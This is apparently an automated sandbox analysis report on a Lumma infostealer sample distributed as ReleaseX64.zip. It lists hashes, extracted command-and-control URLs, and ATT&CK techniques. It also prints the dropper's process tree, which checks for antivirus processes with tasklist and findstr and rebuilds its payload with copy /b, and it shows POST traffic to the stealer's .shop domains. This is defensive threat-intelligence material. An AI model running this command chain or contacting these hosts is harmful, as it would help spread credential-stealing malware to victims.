lumma | 9ede6f41e425b63f515289220cbb8cf04142b65b176bf778fa2e1c763880dcf8

Analysis

max time kernel
94s
max time network
195s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04/01/2025, 06:37 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ReleaseX64.zip
Size

3.0MB
MD5

19dd193f8770746854b06f20070c6645
SHA1

cd7d4639865ed5136d8fa654821d98e84af2ff5d
SHA256

9ede6f41e425b63f515289220cbb8cf04142b65b176bf778fa2e1c763880dcf8
SHA512

22b6e9aefc542193d985aeaee4cc803e7537926d895c417e29421fab3b7ed8e5e00694c563b9c5643c3159ad7d6ae33a16a5d2caff140ef0e5299bd43cc6d595
SSDEEP

49152:4SqZs1iVtNTaL+Wl+LZr6ZiUZ5hWbSo6V+NgsgW2HiZtk/DBhGkls1coWf/sIKvU:xURtkaWlCZr695obg+NPj/kbzpb/OU

Score

10^/10

lumma discovery stealer

Malware Config

Extracted

Family

lumma

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

Extracted

Family

lumma

https://abruptyopsn.shop/api

https://wholersorie.shop/api

https://framekgirus.shop/api

https://tirepublicerj.shop/api

https://noisycuttej.shop/api

https://rabidcowse.shop/api

https://cloudewahsj.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	ReleeseBoostrappers.exe

Executes dropped EXE 2 IoCs

pid	Process
3044	ReleeseBoostrappers.exe
3972	Trackback.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3624	tasklist.exe
2588	tasklist.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\LikesManufacturers	ReleeseBoostrappers.exe
File opened for modification	C:\Windows\HoodRoad	ReleeseBoostrappers.exe
File opened for modification	C:\Windows\SkThong	ReleeseBoostrappers.exe
File opened for modification	C:\Windows\CountedKong	ReleeseBoostrappers.exe
File opened for modification	C:\Windows\SomewhereExplorer	ReleeseBoostrappers.exe
File opened for modification	C:\Windows\CardScenario	ReleeseBoostrappers.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trackback.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReleeseBoostrappers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	7zFM.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2236	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1096	7zFM.exe
1096	7zFM.exe
3972	Trackback.com
3972	Trackback.com
3972	Trackback.com
3972	Trackback.com
3972	Trackback.com
3972	Trackback.com

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1096	7zFM.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	1096	7zFM.exe
Token: 35	1096	7zFM.exe
Token: SeSecurityPrivilege	1096	7zFM.exe
Token: SeSecurityPrivilege	1096	7zFM.exe
Token: SeRestorePrivilege	2188	7zG.exe
Token: 35	2188	7zG.exe
Token: SeSecurityPrivilege	2188	7zG.exe
Token: SeSecurityPrivilege	2188	7zG.exe
Token: SeDebugPrivilege	3624	tasklist.exe
Token: SeDebugPrivilege	2588	tasklist.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1096	7zFM.exe
1096	7zFM.exe
1096	7zFM.exe
2188	7zG.exe
3972	Trackback.com
3972	Trackback.com
3972	Trackback.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3972	Trackback.com
3972	Trackback.com
3972	Trackback.com

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 1096 wrote to memory of 2236	1096	7zFM.exe	85
PID 1096 wrote to memory of 2236	1096	7zFM.exe	85
PID 3044 wrote to memory of 4916	3044	ReleeseBoostrappers.exe	102
PID 3044 wrote to memory of 4916	3044	ReleeseBoostrappers.exe	102
PID 3044 wrote to memory of 4916	3044	ReleeseBoostrappers.exe	102
PID 4916 wrote to memory of 3624	4916	cmd.exe	104
PID 4916 wrote to memory of 3624	4916	cmd.exe	104
PID 4916 wrote to memory of 3624	4916	cmd.exe	104
PID 4916 wrote to memory of 2916	4916	cmd.exe	105
PID 4916 wrote to memory of 2916	4916	cmd.exe	105
PID 4916 wrote to memory of 2916	4916	cmd.exe	105
PID 4916 wrote to memory of 2588	4916	cmd.exe	106
PID 4916 wrote to memory of 2588	4916	cmd.exe	106
PID 4916 wrote to memory of 2588	4916	cmd.exe	106
PID 4916 wrote to memory of 408	4916	cmd.exe	107
PID 4916 wrote to memory of 408	4916	cmd.exe	107
PID 4916 wrote to memory of 408	4916	cmd.exe	107
PID 4916 wrote to memory of 1196	4916	cmd.exe	108
PID 4916 wrote to memory of 1196	4916	cmd.exe	108
PID 4916 wrote to memory of 1196	4916	cmd.exe	108
PID 4916 wrote to memory of 4576	4916	cmd.exe	109
PID 4916 wrote to memory of 4576	4916	cmd.exe	109
PID 4916 wrote to memory of 4576	4916	cmd.exe	109
PID 4916 wrote to memory of 2884	4916	cmd.exe	110
PID 4916 wrote to memory of 2884	4916	cmd.exe	110
PID 4916 wrote to memory of 2884	4916	cmd.exe	110
PID 4916 wrote to memory of 3796	4916	cmd.exe	111
PID 4916 wrote to memory of 3796	4916	cmd.exe	111
PID 4916 wrote to memory of 3796	4916	cmd.exe	111
PID 4916 wrote to memory of 4780	4916	cmd.exe	112
PID 4916 wrote to memory of 4780	4916	cmd.exe	112
PID 4916 wrote to memory of 4780	4916	cmd.exe	112
PID 4916 wrote to memory of 3972	4916	cmd.exe	113
PID 4916 wrote to memory of 3972	4916	cmd.exe	113
PID 4916 wrote to memory of 3972	4916	cmd.exe	113
PID 4916 wrote to memory of 2828	4916	cmd.exe	114
PID 4916 wrote to memory of 2828	4916	cmd.exe	114
PID 4916 wrote to memory of 2828	4916	cmd.exe	114

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ReleaseX64.zip"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO8441F1B7\checkME.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2236

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3368

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap24971:74:7zEvent25326
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2188

C:\Users\Admin\Desktop\blBoostrapperRelesse\ReleeseBoostrappers.exe
"C:\Users\Admin\Desktop\blBoostrapperRelesse\ReleeseBoostrappers.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c move Recognised Recognised.cmd & Recognised.cmd
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- - C:\Windows\SysWOW64\findstr.exe
    findstr /I "opssvc wrsa"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2916
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2588
- - C:\Windows\SysWOW64\findstr.exe
    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:408
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c md 484968
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1196
- - C:\Windows\SysWOW64\extrac32.exe
    extrac32 /Y /E Ratio
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4576
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V "Forgot" Maui
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2884
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b 484968\Trackback.com + Face + Terrorists + Thehun + Closure + Roller + Reception + Nested + Wichita + Casino + Clicking 484968\Trackback.com
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3796
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b ..\Powerseller + ..\Pn + ..\Accreditation + ..\After + ..\Continent + ..\Risk m
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4780
- - C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\484968\Trackback.com
    Trackback.com m
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3972
- - C:\Windows\SysWOW64\choice.exe
    choice /d y /t 5
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2828

Network

DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

166.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.190.18.2.in-addr.arpa

IN PTR

Response

166.190.18.2.in-addr.arpa

IN PTR

a2-18-190-166deploystaticakamaitechnologiescom
DNS

8.153.16.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.153.16.2.in-addr.arpa

IN PTR

Response

8.153.16.2.in-addr.arpa

IN PTR

a2-16-153-8deploystaticakamaitechnologiescom
DNS

jqBcbzoYxWmEjucBamSFvm.jqBcbzoYxWmEjucBamSFvm

Trackback.com

Remote address:

8.8.8.8:53

Request

jqBcbzoYxWmEjucBamSFvm.jqBcbzoYxWmEjucBamSFvm

IN A

Response
DNS

60.153.16.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

60.153.16.2.in-addr.arpa

IN PTR

Response

60.153.16.2.in-addr.arpa

IN PTR

a2-16-153-60deploystaticakamaitechnologiescom
DNS

31.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.243.111.52.in-addr.arpa

IN PTR

Response
DNS

lastlossunbag.click

Trackback.com

Remote address:

8.8.8.8:53

Request

lastlossunbag.click

IN A

Response

lastlossunbag.click

IN A

104.21.32.1

lastlossunbag.click

IN A

104.21.80.1

lastlossunbag.click

IN A

104.21.96.1

lastlossunbag.click

IN A

104.21.48.1

lastlossunbag.click

IN A

104.21.64.1

lastlossunbag.click

IN A

104.21.112.1

lastlossunbag.click

IN A

104.21.16.1
POST

https://lastlossunbag.click/api

Trackback.com

Remote address:

104.21.32.1:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lastlossunbag.click

Response

HTTP/1.1 200 OK

Date: Sat, 04 Jan 2025 06:39:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=biipdu5tu2cma6p6pohjahj0m8; expires=Wed, 30 Apr 2025 00:26:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uUXwQJW4Y5N1JTVne4jM4UalcbVl327ecgcdDjm%2BrRKDLPyH7D0%2BcQkmaCxaQC3oJmLyGHiH6FfxXZ6VmDaZeXFbCaUKLR0SrTR8NCcRmBnQ90sK68jr5ADZsnwPoE%2FBqpjXg%2BYs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fc93ba5edd39482-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=30889&min_rtt=26217&rtt_var=14621&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3309&recv_bytes=611&delivery_rate=135700&cwnd=218&unsent_bytes=0&cid=d4bad921c94336c8&ts=248&x=0"
DNS

nearycrepso.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

nearycrepso.shop

IN A

Response
DNS

nearycrepso.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

nearycrepso.shop

IN A

Response
DNS

1.32.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.32.21.104.in-addr.arpa

IN PTR

Response
DNS

abruptyopsn.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

abruptyopsn.shop

IN A

Response

abruptyopsn.shop

IN A

104.21.64.1

abruptyopsn.shop

IN A

104.21.96.1

abruptyopsn.shop

IN A

104.21.112.1

abruptyopsn.shop

IN A

104.21.32.1

abruptyopsn.shop

IN A

104.21.80.1

abruptyopsn.shop

IN A

104.21.48.1

abruptyopsn.shop

IN A

104.21.16.1
POST

https://abruptyopsn.shop/api

Trackback.com

Remote address:

104.21.64.1:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: abruptyopsn.shop

Response

HTTP/1.1 200 OK

Date: Sat, 04 Jan 2025 06:39:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=8l3dqdq99m6hh70u2frrvcha1b; expires=Wed, 30 Apr 2025 00:26:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9E6dLejiHJ5Cqgw5%2Brt9u60p%2BfdSX2oGtDFh5hq8N5RmXpDGxFFvokp%2BZbnsGlTZlkdjM1o8ytBWbENMNz3IQX1aP3fMwBKVyhf0fZSY5z6AyvbzzGekm2DLJPsPNeeqVHMY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fc93bae5ddc6554-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=28039&min_rtt=26006&rtt_var=8882&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3510&recv_bytes=605&delivery_rate=111595&cwnd=253&unsent_bytes=0&cid=55a5ce1e31d9a590&ts=259&x=0"
DNS

wholersorie.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

wholersorie.shop

IN A

Response

wholersorie.shop

IN A

172.67.160.114

wholersorie.shop

IN A

104.21.41.51
POST

https://wholersorie.shop/api

Trackback.com

Remote address:

172.67.160.114:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: wholersorie.shop

Response

HTTP/1.1 200 OK

Date: Sat, 04 Jan 2025 06:39:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=m3fkdpovpk878pp6qj9ntm21g1; expires=Wed, 30 Apr 2025 00:26:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pr%2BR4oez%2BU6vWicpe%2BStlFBVXXWt8nt5g4wqCvgsbI%2BFwUNN7IRXt04xtZfoPOtpvscKZuKRmTg3WBteJ06TlAng5WV%2B4KI1XjR1ozTHEVKyuF2Sd486k94EOPf8n3QeWoPg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fc93bb06956ed03-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27222&min_rtt=26222&rtt_var=7209&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=132502&cwnd=227&unsent_bytes=0&cid=1b8757b72126c8ad&ts=254&x=0"
DNS

framekgirus.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

framekgirus.shop

IN A

Response

framekgirus.shop

IN A

172.67.179.160

framekgirus.shop

IN A

104.21.18.19
POST

https://framekgirus.shop/api

Trackback.com

Remote address:

172.67.179.160:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: framekgirus.shop

Response

HTTP/1.1 200 OK

Date: Sat, 04 Jan 2025 06:39:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fqddfj1lodugt28jn74qeqvbpg; expires=Wed, 30 Apr 2025 00:26:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMlf7ie4tfP3nxY26T7TdHL3KAafRsRjRXIf%2F3WLISn3i5pr7AQsU7g9uUnWgVu3isOMuCAkKsrnYqHl1%2Bc%2FjpHKGx%2BLJZEiLTNispLlnj710%2FGnhGwq0%2B0euL8mTiDkBemC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fc93bb299344190-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27190&min_rtt=25998&rtt_var=7621&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3295&recv_bytes=605&delivery_rate=138899&cwnd=234&unsent_bytes=0&cid=2cf09549a7df9868&ts=237&x=0"
DNS

1.64.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.64.21.104.in-addr.arpa

IN PTR

Response
DNS

tirepublicerj.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

tirepublicerj.shop

IN A

Response

tirepublicerj.shop

IN A

104.21.112.1

tirepublicerj.shop

IN A

104.21.96.1

tirepublicerj.shop

IN A

104.21.16.1

tirepublicerj.shop

IN A

104.21.32.1

tirepublicerj.shop

IN A

104.21.64.1

tirepublicerj.shop

IN A

104.21.80.1

tirepublicerj.shop

IN A

104.21.48.1
POST

https://tirepublicerj.shop/api

Trackback.com

Remote address:

104.21.112.1:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: tirepublicerj.shop

Response

HTTP/1.1 200 OK

Date: Sat, 04 Jan 2025 06:39:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=9dlgmbpqhoj8q35vrq4k6v2ul3; expires=Wed, 30 Apr 2025 00:26:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dsaNqHqUzL%2B7yE7DG%2BG2onY2Nf9%2FJTLvlIkvSltW1NjGWarC%2BaIRsyGtubC4TYyLqUd99t2TuYc%2FIfgVgjB%2FdyAq0NJfxEajatH7NwDy2%2BAm3B22assFwWltpwco3%2BbEuiawgAg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fc93bb498989485-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27297&min_rtt=26237&rtt_var=7205&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3302&recv_bytes=609&delivery_rate=143719&cwnd=253&unsent_bytes=0&cid=763dd98f7b5603a3&ts=236&x=0"
DNS

noisycuttej.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

noisycuttej.shop

IN A

Response

noisycuttej.shop

IN A

172.67.170.178

noisycuttej.shop

IN A

104.21.71.146
POST

https://noisycuttej.shop/api

Trackback.com

Remote address:

172.67.170.178:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: noisycuttej.shop

Response

HTTP/1.1 200 OK

Date: Sat, 04 Jan 2025 06:39:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=umppd0hgif3v7q1rqmd8cdl6al; expires=Wed, 30 Apr 2025 00:26:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=doE16eSy8Jsrh0ojLrQt%2B5J37Mh%2BeiCXSwgk6GMN6Vx%2B3oyz9%2BOBYGrVOBI3z%2FE2P1EZ6psElUxgsXanUARA33LK%2BGG9%2BQ2jD2263CDTgqntm%2BvseVxSRHEnSNIR6fI2Asf3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fc93bb6af00ef05-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27505&min_rtt=26147&rtt_var=7619&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=143385&cwnd=253&unsent_bytes=0&cid=a6cc059132877cd6&ts=230&x=0"
DNS

rabidcowse.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

rabidcowse.shop

IN A

Response

rabidcowse.shop

IN A

172.67.156.127

rabidcowse.shop

IN A

104.21.7.224
POST

https://rabidcowse.shop/api

Trackback.com

Remote address:

172.67.156.127:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: rabidcowse.shop

Response

HTTP/1.1 200 OK

Date: Sat, 04 Jan 2025 06:39:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=9hu9iid86si074s9s2660nmaqu; expires=Wed, 30 Apr 2025 00:26:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNh0rRIQjxfFj%2BKyNUfcDnqd8%2FE3TZ6O4tmoHEi1yBg4K5f%2F25OvfOoHJJrI%2BBJWI%2Fgu%2BlnYg%2Bo4t39F%2FHzw%2FQy%2BVlcXPC1ucHd5HS2pnFP3ur0dURCwwPso0NqCDbLoIJM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fc93bb8aa47f653-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27664&min_rtt=26226&rtt_var=7852&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=603&delivery_rate=124873&cwnd=245&unsent_bytes=0&cid=055aa5bc7d6b49d5&ts=247&x=0"
DNS

cloudewahsj.shop

Trackback.com

Remote address:

8.8.8.8:53

Request

cloudewahsj.shop

IN A

Response

cloudewahsj.shop

IN A

104.21.64.1

cloudewahsj.shop

IN A

104.21.96.1

cloudewahsj.shop

IN A

104.21.80.1

cloudewahsj.shop

IN A

104.21.48.1

cloudewahsj.shop

IN A

104.21.16.1

cloudewahsj.shop

IN A

104.21.112.1

cloudewahsj.shop

IN A

104.21.32.1
DNS

114.160.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.160.67.172.in-addr.arpa

IN PTR

Response
DNS

160.179.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

160.179.67.172.in-addr.arpa

IN PTR

Response
DNS

1.112.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.21.104.in-addr.arpa

IN PTR

Response
DNS

